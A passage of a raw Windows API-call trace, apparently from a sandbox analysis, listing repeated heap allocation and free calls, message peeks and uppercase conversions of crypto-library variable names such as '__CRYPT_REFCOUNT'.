lpMem=0xdffcd0 | out: hHeap=0xb80000) returned 1 [0269.286] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd9aee8 [0269.286] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x40) returned 0xda41a0 [0269.286] PeekMessageW (in: lpMsg=0x75f13c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f13c) returned 0 [0269.286] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffcd0 [0269.286] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xe19ca8 [0269.286] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0269.286] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe19ca8 | out: hHeap=0xb80000) returned 1 [0269.286] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffcd0 | out: hHeap=0xb80000) returned 1 [0269.286] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd9acc0 [0269.286] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x40) returned 0xda41e8 [0269.286] PeekMessageW (in: lpMsg=0x75eee4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75eee4) returned 0 [0269.286] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffcd0 [0269.287] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffc50 [0269.287] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc50 | out: hHeap=0xb80000) returned 1 [0269.287] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffc50 [0269.287] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x18) returned 0xde30f8 [0269.287] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xde30f8 | out: hHeap=0xb80000) returned 1 [0269.287] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc50 | out: hHeap=0xb80000) returned 1 [0269.287] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffcd0 | out: hHeap=0xb80000) returned 1 [0269.287] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xde00c0 [0269.287] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd9ae28 [0269.287] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd989e0 [0269.287] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd9ae40 [0269.287] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd9adb0 [0269.287] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd9ad50 [0269.287] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd9b038 [0269.287] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd9ade0 [0269.287] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd98b00 [0269.287] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffcd0 [0269.287] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffcd0 | out: hHeap=0xb80000) returned 1 [0269.287] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffcd0 [0269.288] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffcd0 | out: hHeap=0xb80000) returned 1 [0269.288] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffcd0 [0269.288] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffcd0 | out: hHeap=0xb80000) returned 1 [0269.288] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd989e0 | out: hHeap=0xb80000) returned 1 [0269.288] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9ae28 | out: hHeap=0xb80000) returned 1 [0269.288] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9ae40 | out: hHeap=0xb80000) returned 1 [0269.288] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9adb0 | out: hHeap=0xb80000) returned 1 [0269.288] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9ad50 | out: hHeap=0xb80000) returned 1 [0269.288] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b038 | out: hHeap=0xb80000) returned 1 [0269.288] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9ade0 | out: hHeap=0xb80000) returned 1 [0269.288] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98b00 | out: hHeap=0xb80000) returned 1 [0269.288] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xde00c0 | out: hHeap=0xb80000) returned 1 [0269.288] PeekMessageW (in: lpMsg=0x75eee4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75eee4) returned 0 [0269.288] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda41e8 | out: hHeap=0xb80000) returned 1 [0269.288] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9acc0 | out: hHeap=0xb80000) returned 1 [0269.288] PeekMessageW (in: lpMsg=0x75f13c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f13c) returned 0 [0269.288] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffcd0 [0269.288] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffc50 [0269.288] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xe19ca8 [0269.288] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0269.288] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe19ca8 | out: hHeap=0xb80000) returned 1 [0269.289] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc50 | out: hHeap=0xb80000) returned 1 [0269.289] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd9acc0 [0269.289] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x40) returned 0xda41e8 [0269.289] PeekMessageW (in: lpMsg=0x75ed1c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75ed1c) returned 0 [0269.289] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffc50 [0269.289] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffba0 [0269.289] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffba0 | out: hHeap=0xb80000) returned 1 [0269.289] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc50 | out: hHeap=0xb80000) returned 1 [0269.289] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda41e8 | out: hHeap=0xb80000) returned 1 [0269.289] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9acc0 | out: hHeap=0xb80000) returned 1 [0269.289] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffc50 [0269.289] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x18) returned 0xde30f8 [0269.289] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xde30f8 | out: hHeap=0xb80000) returned 1 [0269.289] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc50 | out: hHeap=0xb80000) returned 1 [0269.289] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffcd0 | out: hHeap=0xb80000) returned 1 [0269.289] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17ba0 [0269.289] PeekMessageW (in: lpMsg=0x75f13c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f13c) returned 0 [0269.289] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17ba0 | out: hHeap=0xb80000) returned 1 [0269.289] PeekMessageW (in: lpMsg=0x75f13c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f13c) returned 0 [0269.289] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda41a0 | out: hHeap=0xb80000) returned 1 [0269.289] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9aee8 | out: hHeap=0xb80000) returned 1 [0269.290] PeekMessageW (in: lpMsg=0x75f394, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f394) returned 0 [0269.290] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffcd0 [0269.290] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffc50 [0269.290] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffba0 [0269.290] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x18) returned 0xde30f8 [0269.290] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffb70 [0269.290] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffb70 | out: hHeap=0xb80000) returned 1 [0269.290] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffba0 | out: hHeap=0xb80000) returned 1 [0269.291] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xde30f8 | out: hHeap=0xb80000) returned 1 [0269.291] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc50 | out: hHeap=0xb80000) returned 1 [0269.291] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffcd0 | out: hHeap=0xb80000) returned 1 [0269.291] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17ba0 [0269.291] PeekMessageW (in: lpMsg=0x75f394, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f394) returned 0 [0269.291] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffcd0 [0269.291] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffcd0 | out: hHeap=0xb80000) returned 1 [0269.291] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17ba0 | out: hHeap=0xb80000) returned 1 [0269.291] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda4158 | out: hHeap=0xb80000) returned 1 [0269.291] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b050 | out: hHeap=0xb80000) returned 1 [0269.291] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xde0098 | out: hHeap=0xb80000) returned 1 [0269.291] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc30 | out: hHeap=0xb80000) returned 1 [0269.291] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xde0020 | out: hHeap=0xb80000) returned 1 [0269.291] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9adc8 | out: hHeap=0xb80000) returned 1 [0269.291] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9ae58 | out: hHeap=0xb80000) returned 1 [0269.291] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffbb0 | out: hHeap=0xb80000) returned 1 [0269.291] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddfff8 | out: hHeap=0xb80000) returned 1 [0269.291] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9ad68 | out: hHeap=0xb80000) returned 1 [0269.291] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xde0110 | out: hHeap=0xb80000) returned 1 [0269.291] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffcb0 | out: hHeap=0xb80000) returned 1 [0269.291] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xde00e8 | out: hHeap=0xb80000) returned 1 [0269.292] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9aca8 | out: hHeap=0xb80000) returned 1 [0269.292] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98860 | out: hHeap=0xb80000) returned 1 [0269.292] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffb10 | out: hHeap=0xb80000) returned 1 [0269.292] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc7618 | out: hHeap=0xb80000) returned 1 [0269.292] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffb50 | out: hHeap=0xb80000) returned 1 [0269.292] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98950 | out: hHeap=0xb80000) returned 1 [0269.292] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9aea0 | out: hHeap=0xb80000) returned 1 [0269.292] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc40 | out: hHeap=0xb80000) returned 1 [0269.292] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddfe90 | out: hHeap=0xb80000) returned 1 [0269.292] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9ad38 | out: hHeap=0xb80000) returned 1 [0269.292] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffca0 | out: hHeap=0xb80000) returned 1 [0269.292] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddfdf0 | out: hHeap=0xb80000) returned 1 [0269.293] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98830 | out: hHeap=0xb80000) returned 1 [0269.293] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xde0138 | out: hHeap=0xb80000) returned 1 [0269.293] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98d40 | out: hHeap=0xb80000) returned 1 [0269.293] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd988f0 | out: hHeap=0xb80000) returned 1 [0269.293] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9aeb8 | out: hHeap=0xb80000) returned 1 [0269.293] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b0f8 | out: hHeap=0xb80000) returned 1 [0269.293] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98920 | out: hHeap=0xb80000) returned 1 [0269.293] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9afa8 | out: hHeap=0xb80000) returned 1 [0269.293] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9aed0 | out: hHeap=0xb80000) returned 1 [0269.293] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddfe18 | out: hHeap=0xb80000) returned 1 [0269.293] PeekMessageW (in: lpMsg=0x75f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f6b4) returned 0 [0269.293] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffca0 [0269.293] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfe18 [0269.293] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0269.293] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddfe18 | out: hHeap=0xb80000) returned 1 [0269.293] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffca0 | out: hHeap=0xb80000) returned 1 [0269.293] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd9aed0 [0269.293] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x40) returned 0xda4158 [0269.293] PeekMessageW (in: lpMsg=0x75f45c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f45c) returned 0 [0269.293] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffca0 [0269.293] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xe19ca8 [0269.293] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0269.293] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe19ca8 | out: hHeap=0xb80000) returned 1 [0269.293] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffca0 | out: hHeap=0xb80000) returned 1 [0269.294] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd9afa8 [0269.294] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x40) returned 0xda41a0 [0269.294] PeekMessageW (in: lpMsg=0x75f204, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f204) returned 0 [0269.294] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffca0 [0269.294] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffc40 [0269.294] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc40 | out: hHeap=0xb80000) returned 1 [0269.294] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffc40 [0269.294] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x18) returned 0xde30f8 [0269.294] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xde30f8 | out: hHeap=0xb80000) returned 1 [0269.294] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc40 | out: hHeap=0xb80000) returned 1 [0269.294] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffca0 | out: hHeap=0xb80000) returned 1 [0269.294] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfe18 [0269.294] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd98920 [0269.294] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b0f8 [0269.294] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd9aeb8 [0269.294] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd988f0 [0269.294] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd98d40 [0269.294] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd98830 [0269.294] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd9ad38 [0269.294] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd9aea0 [0269.294] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffca0 [0269.295] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffca0 | out: hHeap=0xb80000) returned 1 [0269.295] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffca0 [0269.295] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffca0 | out: hHeap=0xb80000) returned 1 [0269.295] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffca0 [0269.295] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffca0 | out: hHeap=0xb80000) returned 1 [0269.295] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b0f8 | out: hHeap=0xb80000) returned 1 [0269.295] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98920 | out: hHeap=0xb80000) returned 1 [0269.295] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9aeb8 | out: hHeap=0xb80000) returned 1 [0269.295] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd988f0 | out: hHeap=0xb80000) returned 1 [0269.295] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98d40 | out: hHeap=0xb80000) returned 1 [0269.295] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98830 | out: hHeap=0xb80000) returned 1 [0269.295] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9ad38 | out: hHeap=0xb80000) returned 1 [0269.295] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9aea0 | out: hHeap=0xb80000) returned 1 [0269.295] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddfe18 | out: hHeap=0xb80000) returned 1 [0269.295] PeekMessageW (in: lpMsg=0x75f204, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f204) returned 0 [0269.295] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda41a0 | out: hHeap=0xb80000) returned 1 [0269.295] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9afa8 | out: hHeap=0xb80000) returned 1 [0269.295] PeekMessageW (in: lpMsg=0x75f45c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f45c) returned 0 [0269.295] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffca0 [0269.295] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffc40 [0269.295] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xe19ca8 [0269.295] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0269.295] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe19ca8 | out: hHeap=0xb80000) returned 1 [0269.296] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc40 | out: hHeap=0xb80000) returned 1 [0269.296] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd9afa8 [0269.296] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x40) returned 0xda41a0 [0269.296] PeekMessageW (in: lpMsg=0x75f03c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f03c) returned 0 [0269.296] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffc40 [0269.296] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffb50 [0269.296] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffb50 | out: hHeap=0xb80000) returned 1 [0269.296] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc40 | out: hHeap=0xb80000) returned 1 [0269.297] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda41a0 | out: hHeap=0xb80000) returned 1 [0269.297] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9afa8 | out: hHeap=0xb80000) returned 1 [0269.297] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffc40 [0269.297] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x18) returned 0xde30f8 [0269.297] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xde30f8 | out: hHeap=0xb80000) returned 1 [0269.297] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc40 | out: hHeap=0xb80000) returned 1 [0269.297] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffca0 | out: hHeap=0xb80000) returned 1 [0269.297] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17ba0 [0269.297] PeekMessageW (in: lpMsg=0x75f45c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f45c) returned 0 [0269.297] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfe18 [0269.298] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9afa8 [0269.298] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffca0 [0269.298] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffc40 [0269.298] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xe19ca8 [0269.298] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0269.298] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe19ca8 | out: hHeap=0xb80000) returned 1 [0269.298] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc40 | out: hHeap=0xb80000) returned 1 [0269.298] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd9aea0 [0269.298] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x40) returned 0xda41a0 [0269.298] PeekMessageW (in: lpMsg=0x75f02c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f02c) returned 0 [0269.298] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffc40 [0269.298] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffb50 [0269.298] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffb50 | out: hHeap=0xb80000) returned 1 [0269.298] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc40 | out: hHeap=0xb80000) returned 1 [0269.298] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda41a0 | out: hHeap=0xb80000) returned 1 [0269.298] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9aea0 | out: hHeap=0xb80000) returned 1 [0269.298] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffca0 | out: hHeap=0xb80000) returned 1 [0269.298] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9aea0 [0269.298] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffca0 [0269.298] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9ad38 [0269.298] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffca0 | out: hHeap=0xb80000) returned 1 [0269.299] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98830 [0269.299] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffca0 [0269.299] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98d40 [0269.299] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffca0 | out: hHeap=0xb80000) returned 1 [0269.299] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd988f0 [0269.299] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffca0 [0269.299] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9aeb8 [0269.299] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffca0 | out: hHeap=0xb80000) returned 1 [0269.299] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98920 [0269.299] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffca0 [0269.299] RtlAllocateHeap 